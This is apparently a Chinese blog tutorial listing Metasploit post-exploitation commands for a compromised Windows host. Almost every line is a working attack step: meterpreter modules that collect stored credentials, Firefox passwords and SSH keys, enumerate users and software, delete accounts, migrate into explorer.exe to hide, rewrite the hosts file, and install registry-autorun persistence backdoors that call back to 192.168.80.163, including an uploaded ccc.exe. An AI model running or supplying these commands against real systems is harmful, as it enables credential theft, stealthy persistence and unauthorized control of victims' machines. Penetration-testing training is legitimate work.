POST模块、后门

msf exploit(psexec) > use exploit/multi/handler

msf exploit(handler) > set exitonsession false  运行这条命令后,4444端口会一直处于侦听状态

msf exploit(handler) > exploit -j -z


meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.80.0/24

meterpreter > run post/windows/gather/credentials/credential_collector  目标主机上的身份认证信息

meterpreter >  run post/windows/gather/enum_applications  目标主机安装了哪些软件

meterpreter >  run post/windows/gather/enum_logged_on_users  目标主机当前在线的用户(SID=500是管理员账号)

meterpreter > run post/windows/gather/enum_snmp  枚举snmp信息

meterpreter >  run post/multi/recon/local_exploit_suggester  目标主机存在哪些本地提权漏洞

meterpreter > run post/windows/manage/delete_user USERNAME=a  删除目标主机的a账号

meterpreter > run post/multi/gather/env  目标主机环境变量信息

meterpreter > run post/multi/gather/firefox_creds  目标主机火狐浏览器保存的账号密码

meterpreter > run post/multi/gather/ssh_creds  目标主机保存的ssh身份验证信息(linux系统常用)



meterpreter > getpid

meterpreter > ps

meterpreter > migrate -N explorer.exe  将meterpreter进程转移到explorer.exe中


自动执行post模块

实例:获得shell后,自动执行migrate命令来迁移进程

msf exploit(handler) > show advanced  查看高级参数

msf exploit(handler) > set autorunscript migrate -n explorer.exe

msf exploit(handler) > exploit

POST模块、后门_第1张图片
自动迁移进程

或者使用post/windows/manage/migrate模块,同样能达到迁移进程的效果。

meterpreter > info post/windows/manage/migrate  查看模块的详细信息

msf exploit(handler) > set autorunscript post/windows/manage/migrate name=explorer.exe spawn=false

msf exploit(handler) > exploit


msf exploit(handler) > set initialautorunscript post/windows/manage/migrate  成功exploit后,自动执行migrate模块(before AutoRunScript)


meterpreter > run post/windows/manage/inject_host ip=1.1.1.1 domain=www.baidu.com  修改目标主机的host文件


这些只是一小部分post模块,在meterpreter下按两下tab键,有200多个post模块,可以多尝试使用!


后门

meterpreter > run persistence -X -i 5 -p 1234 -r 192.168.80.163  向目标主机的注册表添加键值,使后门程序开机自启

msf > resource handler.rc  可以直接获得目标主机的shell,注意此时lport是1234

meterpreter > run persistence -X -i 5 -p 77 -T /root/ccc.exe -r 192.168.80.163  用-T选项指定上传的执行程序是ccc.exe

你可能感兴趣的:(POST模块、后门)